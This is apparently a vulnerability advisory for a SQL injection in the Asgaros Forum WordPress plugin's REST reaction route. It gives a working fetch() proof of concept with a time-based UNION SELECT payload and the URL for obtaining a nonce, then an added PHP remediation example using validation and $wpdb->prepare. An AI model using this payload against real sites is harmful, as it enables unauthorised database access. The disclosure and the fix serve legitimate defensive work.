The plugin does not sanitise and escape the post_id parameter before using it in a SQL statement via a REST route of the plugin (accessible to any authenticated user), leading to a SQL injection
As any authenticated user, such as a subscriber.

To get the nonce: /wp-admin/admin-ajax.php?action=rest-nonce

    fetch("?rest_route=/asgaros-forum/v1/reaction/1/hello", {
      "headers": { "content-type": "application/x-www-form-urlencoded" },
      "body": "post_id=1 UNION SELECT 1, 1, 1, 1, 1,2,3,4,5,sleep(5) FROM dual -- g&_wpnonce=59c63b25b1",
      "method": "POST",
      "credentials": "include"
    }).then(response => response.text())
      .then(data => console.log(data));
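The remediation pattern for the flaw described above, as an added example that is not the plugin's own code: the route declares post_id as a validated integer argument, the callback casts it again with absint(), and the value reaches MySQL only through $wpdb->prepare(). The function names, the route namespace and the table name are assumptions made for illustration.

```php
<?php
// Added example (hypothetical names), not code from the Asgaros Forum plugin.

// 1. Register the route with argument validation and a permission check.
add_action( 'rest_api_init', function () {
    register_rest_route( 'example-forum/v1', '/reaction', array(
        'methods'             => 'POST',
        'callback'            => 'example_forum_reaction_callback',
        // Any logged-in user may call it, but never an anonymous one.
        'permission_callback' => 'is_user_logged_in',
        'args'                => array(
            'post_id' => array(
                'required'          => true,
                // Reject "1 UNION SELECT ..." before the callback ever runs.
                'validate_callback' => function ( $value ) {
                    return is_numeric( $value ) && (int) $value > 0;
                },
                'sanitize_callback' => 'absint',
            ),
        ),
    ) );
} );

// 2. The callback itself never concatenates request data into SQL.
function example_forum_reaction_callback( WP_REST_Request $request ) {
    global $wpdb;

    // Vulnerable shape, shown only for contrast (do not use):
    // $sql = "SELECT ... WHERE post_id = " . $request['post_id'];

    // Hardened: defence in depth, cast again even though the route validated it.
    $post_id = absint( $request->get_param( 'post_id' ) );
    if ( 0 === $post_id ) {
        return new WP_Error( 'invalid_post_id', 'post_id must be a positive integer',
            array( 'status' => 400 ) );
    }

    // %d binds the value as an integer; the string can no longer be altered.
    $sql = $wpdb->prepare(
        "SELECT reaction, COUNT(*) AS total
           FROM {$wpdb->prefix}example_forum_reactions
          WHERE post_id = %d
          GROUP BY reaction",
        $post_id
    );
    return rest_ensure_response( $wpdb->get_results( $sql ) );
}
```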
Krzysztof Zając
Krzysztof Zając
Yes
2022-01-31
2022-01-31
2022-04-12